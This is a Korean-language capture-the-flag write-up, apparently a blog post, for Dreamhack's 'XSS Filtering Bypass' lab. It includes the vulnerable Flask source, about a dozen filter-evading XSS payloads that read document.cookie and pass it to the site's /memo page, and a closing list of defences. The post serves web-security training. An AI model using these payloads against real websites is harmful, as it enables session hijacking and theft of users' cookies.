[Dreamhack] Level1: XSS Filtering Bypass

🛎️ Access

Exercise: XSS Filtering Bypass에서 실습하는 문제이다.

👾Exploit Algorithm & Payload

#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open("./flag.txt", "r").read()
except:
    FLAG = "[**FLAG**]"


def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome("/chromedriver", options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True


def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)

def xss_filter(text):
    _filter = ["script", "on", "javascript"]
    for f in _filter:
        if f in text.lower():
            text = text.replace(f, "")
    return text

@app.route("/")
def index():
    return render_template("index.html")


@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    param = xss_filter(param)
    return param


@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'


memo_text = ""


@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)


app.run(host="0.0.0.0", port=8000)

#1

: '/' 페이지에서 vuln(xss) page, memo, flag 페이지로 접속할 수 있다.

: '/vuln' 페이지에서 param이라는 파라미터에 파라미터 값을 입력하면 다음과 같은 반응을 얻을 수 있다.

: xss 취약점이 발생할 것 같다는 것을 확인할 수 있다.

: '/memo' 페이지에서 memo라는 파라미터에 파라미터 값을 입력하면 출력값을 확인할 수 있다.

: 취약점이 있는 페이지를 이용해 이 페이지에서 결과를 확인할 수 있을 것 같다.

: '/flag' 페이지에서 POST 방식으로 xss 취약점의 위치에 파라미터 값을 제출하면 FLAG를 획득할 수 있을 것으로 보인다.

#2

#...
    _filter = ["script", "on", "javascript"]
    for f in _filter:
        if f in text.lower():
            text = text.replace(f, "")
#...

: 다음과 같이 script, on, javascript라는 단어는 필터링되어 있는 것을 알 수 있다.

: 하지만 필터링 자체가 미흡한 것을 알 수 있다.

(filter 소문자에 대해서만 필터링 처리하고 이를 공백("")처리한다.)

# on 필터링 문자를 의도적으로 삽입하여 xss 우회 공격
<scscriptnipt>alert(1)</scrscriptipt>
<img src="x" oonnerror="xss_bypass">
<svg src="x" oonnerror="xss_bypass">
...

#대문자 이용한 삽입 xss 우회 공격
<Script>alert(1)</Script>

# Unicode escape sequence를 이용한 xss 우회 공격
<img src="x" \u006Enerror="xss_bypass">

: 필터링을 미흡하게 처리했기 때문에 다음과 같이 다양하게 xss 우회 공격이 가능했다.

🔑Analysis and results for obtaining the Flag DH{…}

#대소문자&고의적 필터링 삽입 이용한 xss 우회 공격
<Script>locatioonn.href="/memo?memo="+document.cookie;</Script>

#고의적 필터링 삽입&Unicode escape sequence 이용한 xss 우회 공격
<sconript>locatio\u006E.href="/memo?memo="+document.cookie;</sconript>

#고의적 필터링 삽입&Computed member access 이용한 xss 우회 공격
<sconript>document['locatio'+'n'].href="/memo?memo="+document.cookie;</sconript>

#img 태그(onerror)&고의적 필터링 삽입을 이용한 xss 우회 공격
<img src="x" oonnerror="locatioonn.href='/memo?memo='+document.cookie">

#svg 태그&고의적 필터링 삽입을 이용한 xss 우회 공격
<svg oonnload="locatioonn.href='/memo?memo='+document.cookie">
<svg/oonnload="locatioonn.href='/memo?memo='+document.cookie">

#body 태그&고의적 필터링 삽입을 이용한 xss 우쇠 공격
<body/oonnload="locatioonn.href='/memo?memo='+document.cookie">

#javascript 사이 Tab&고의적 필터링 삽입
<iframe src="javascr ipt:locatioonn.href='/memo?memo='+document.cookie">
#javascript 사이 Tab(Embedded Encoded tab)&고의적 필터링 삽입
<iframe src="javascr	ipt:locatioonn.href='/memo?memo='+document.cookie">
#javascript 사이 Tab(Embedded newline to break up XSS)&고의적 필터링 삽입
<iframe src="javascr
ipt:locatioonn.href='/memo?memo='+document.cookie">

: 다양한 방법으로 우회가 가능했으며 FLAG를 획득할 수 있다.

📌Summary

필터링 우회 접근들은 이것 이외에도 다양하게 발생 할 수 있음

- XSS 우회 공격 대응방안 -

- 입력 유효성 검사

- 컨텍스트 인식 출력 인코딩

- 콘텐츠 보안 정책(CSP)

- HTTP 전용 쿠키

- 동적 데이터를 적절하게 이스케이프 처리

- WAF 사용

- 정기 보안 업데이트 및 패치

- 보안 테스트 및 코드 검토

…

XSS 공격은 다양하게 변형하여 적용할 수 있고, 새로운 우회 기술이 계속 나타날 수 있기 때문에 최신 보안 모범 사례로 최신 정보를 유지 및 지속적 모니터링 중요

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

[Dreamhack] Level3: CSP Bypass Advanced (0)	2024.01.17
[Dreamhack] Level2: CSP Bypass (0)	2023.11.18
[Dreamhack] Level3: XSS Filtering Bypass Advanced (0)	2023.09.02

Yun2

[Dreamhack] Level1: XSS Filtering Bypass

🛎️ Access

👾Exploit Algorithm & Payload

#1

#2

🔑Analysis and results for obtaining the Flag DH{…}

📌Summary

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

티스토리툴바

[Dreamhack] Level1: XSS Filtering Bypass

🛎️ Access

👾Exploit Algorithm & Payload

#1

#2

🔑Analysis and results for obtaining the Flag DH{…}

📌Summary

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

관련글

티스토리툴바